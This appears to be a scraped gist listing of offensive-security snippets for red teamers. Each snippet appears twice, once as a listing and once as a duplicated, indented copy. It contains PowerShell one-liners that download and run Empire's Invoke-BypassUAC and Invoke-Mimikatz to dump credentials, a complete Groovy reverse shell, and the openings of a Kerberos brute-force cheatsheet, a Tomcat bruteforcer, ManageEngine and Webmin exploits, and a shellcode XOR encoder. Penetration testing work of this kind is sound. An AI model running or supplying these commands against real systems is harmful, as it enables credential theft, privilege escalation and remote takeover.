Joseph McPeters fuzzlove

## teamviewer_password_decrypt.py
import sys, hexdump, binascii
from Crypto.Cipher import AES

class AESCipher:
    def __init__(self, key):
        self.key = key

    def decrypt(self, iv, data):
        self.cipher = AES.new(self.key, AES.MODE_CBC, iv)
        return self.cipher.decrypt(data)

## Base64EncodeFile.ps1
$filename = "C:\\Testing\donut\\payload.bin"
[Convert]::ToBase64String([IO.File]::ReadAllBytes($filename)) | clip

## kerberos_attacks_cheatsheet.md

      
              1 file
            
          
              385 forks
            
          
                7 comments
              
            
              1150 stars
            
          
                TarlogicSecurity
                / kerberos_attacks_cheatsheet.md
            
            
              Created
              May 14, 2019 13:33
            
              
                A cheatsheet with commands that can be used to perform kerberos attacks
              
          
    Kerberos cheatsheet

Bruteforcing

With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:

  
## RedTeam_CheatSheet.ps1
# Description:
#    Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.

# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"

# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

# Import Mimikatz Module to run further commands

## tomcat_bruteforce.py
"""
    Tomcat bruteforce
    Author: @itsecurityco
"""

import os
import sys
import getopt
import base64
import requests

## sources.list
# For Hackers And Programmers

###########################################
#        REPOSITORY BY BL4CKvGHOST        #
###########################################

#Kali Repo
deb http://http.kali.org/kali kali-rolling main non-free contrib
deb http://http.kali.org/kali kali-rolling main contrib non-free
deb-src http://http.kali.org/kali kali-rolling main contrib non-free

## manage-engine-exploit.py
#!/usr/bin/python
import requests
import os
import subprocess
import psutil
import time
import sys

# A quick and dirty exploit of ManageEngine Desktop Central StatusUpdate Arbitrary File Upload
# Based off - https://www.exploit-db.com/exploits/34594/

## wmsploit-remote-root-1.29-reprise.sh
HOST=$1;
PORT=$2;
LHOST=$3;
LPORT=$4;
if [ $# -lt 4 ]
  then
echo "Webmin <1.29 remote root exploit by oxagast"
echo "Priv esc by directory transversal to find cookie in logfile file as root, then session highjack into RCE.";
echo "Thanks to UmZ for directory transversal attack; greets to enki for asking me to try this!";
echo "Usage:"

## encshell.py
#!/usr/bin/python

# This script reads binary file specified in first
# parameter and then encodes every byte by simply
# XORing it with custom value (specified in second param)
# and writes output to another file.
# If second parameter wasn't specified (i.e XOR argument)
# then 0xAA is taken by default. In addition it prepends shellcode
# with simple decoding routine and appends decode-end marker
# if needed.

## revsh.groovy
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
	import sys, hexdump, binascii
	from Crypto.Cipher import AES

	class AESCipher:
	def __init__(self, key):
	self.key = key

	def decrypt(self, iv, data):
	self.cipher = AES.new(self.key, AES.MODE_CBC, iv)
	return self.cipher.decrypt(data)
	$filename = "C:\\Testing\donut\\payload.bin"
	[Convert]::ToBase64String([IO.File]::ReadAllBytes($filename)) \| clip
	# Description:
	# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.

	# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
	powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"

	# Invoke-Mimikatz: Dump credentials from memory
	powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

	# Import Mimikatz Module to run further commands
	"""
	Tomcat bruteforce
	Author: @itsecurityco
	"""

	import os
	import sys
	import getopt
	import base64
	import requests
	# For Hackers And Programmers

	###########################################
	# REPOSITORY BY BL4CKvGHOST #
	###########################################

	#Kali Repo
	deb http://http.kali.org/kali kali-rolling main non-free contrib
	deb http://http.kali.org/kali kali-rolling main contrib non-free
	deb-src http://http.kali.org/kali kali-rolling main contrib non-free
	#!/usr/bin/python
	import requests
	import os
	import subprocess
	import psutil
	import time
	import sys

	# A quick and dirty exploit of ManageEngine Desktop Central StatusUpdate Arbitrary File Upload
	# Based off - https://www.exploit-db.com/exploits/34594/
	HOST=$1;
	PORT=$2;
	LHOST=$3;
	LPORT=$4;
	if [ $# -lt 4 ]
	then
	echo "Webmin <1.29 remote root exploit by oxagast"
	echo "Priv esc by directory transversal to find cookie in logfile file as root, then session highjack into RCE.";
	echo "Thanks to UmZ for directory transversal attack; greets to enki for asking me to try this!";
	echo "Usage:"
	#!/usr/bin/python

	# This script reads binary file specified in first
	# parameter and then encodes every byte by simply
	# XORing it with custom value (specified in second param)
	# and writes output to another file.
	# If second parameter wasn't specified (i.e XOR argument)
	# then 0xAA is taken by default. In addition it prepends shellcode
	# with simple decoding routine and appends decode-end marker
	# if needed.
	String host="localhost";
	int port=8044;
	String cmd="cmd.exe";
	Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();